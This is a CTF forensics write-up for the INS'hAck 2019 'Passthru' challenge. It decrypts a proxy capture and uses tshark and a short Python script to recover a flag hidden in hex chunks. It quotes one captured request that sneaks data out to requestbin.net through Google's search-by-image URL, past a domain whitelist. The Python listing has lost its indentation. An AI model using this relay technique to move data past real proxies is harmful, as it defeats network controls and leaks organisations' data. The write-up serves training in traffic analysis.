Tags: forensics 


# INS'hAck 2019

[ https://ctftime.org/event/763 ]

## Passthru

> You're part of a company security team and the admin has recently enabled interception on the company filtering proxy. The admin is pretty confident when it comes to its domain whitelist. He gave you a [capture](https://static.ctf.insecurity-insa.fr/13140c280d45224949bfe7fc1b978c6b97ddd55d.tar.gz) to review. Time to prove him wrong.

[ **forensics** : 206pts ]

Extracting and then unzipping `passthru.zip` from the given [download](https://static.ctf.insecurity-insa.fr/13140c280d45224949bfe7fc1b978c6b97ddd55d.tar.gz), gives the following two files:


Inspecting `capture.pcap` in `wireshark` required setting the `(PRE)-Master-Secret log filename` to point at `sslkey.log` in order to view the `TLS` data.

After spending a while examining the decrypted packet data, the only thing that seemed to call for a closer investigation was the URL mentioned in repeated `GET` requests to [images.google.com](https://images.google.com/):

GET /searchbyimage?image_url=http%3A%2F%2Frequestbin.net%2Fr%2Fzk2s2ezk%3Fid%3D82290383-7480-487c-b78b-77ac769c56cd%26kcahsni%3D9ef773fe97f56554a3b4&encoded_image=&image_content=&filename=&hl=fr HTTP/1.1

Decoding the `image_url` querystring parameter makes it a little easier to read:


Visiting the image URL and a deeper look into [requestbin.net](http://requestbin.net/) uncovered nothing special; however, the use of the parameter `kcahsni` in the URL, which spells `inshack` (the name of the CTF) backwards, suggested looking further and it soon became obvious that the hex characters following `kcahsni` changed for each subsequent `GET` request. Concatenating these values together to see if they revealed the flag was the logical next step.

The following commands extract all the querystring parameters into a file called `queries.txt` (the `editcap` command was only necessary as `tshark` kept erroring because the original `pcap` file had truncated the final packet):

editcap -r capture.pcap fixed.pcap 1-5438
tshark -r fixed.pcap -o 'ssl.keylog_file:sslkey.log' -Y 'http contains "GET /searchbyimage"' -T fields -e http.request.uri.query.parameter > queries.txt

And the script below then extracts and concatenates all the `kcahsni` hex values before decoding them.

hexstr = ''
with open('queries.txt', 'rt') as f:
hexstr = ''.join([param.split(',')[0][109:] for param in f.readlines()])

out = bytes.fromhex(hexstr).decode('latin1')

The output wasn't pretty, but the flag is relatively obvious.


A little string slicing and reversing, `print(out[102:32:-1])`, then cleans up the flag:


Original writeup (https://github.com/zhengzufu/ctf/tree/master/2019/2019-05-03-inshack#passthru).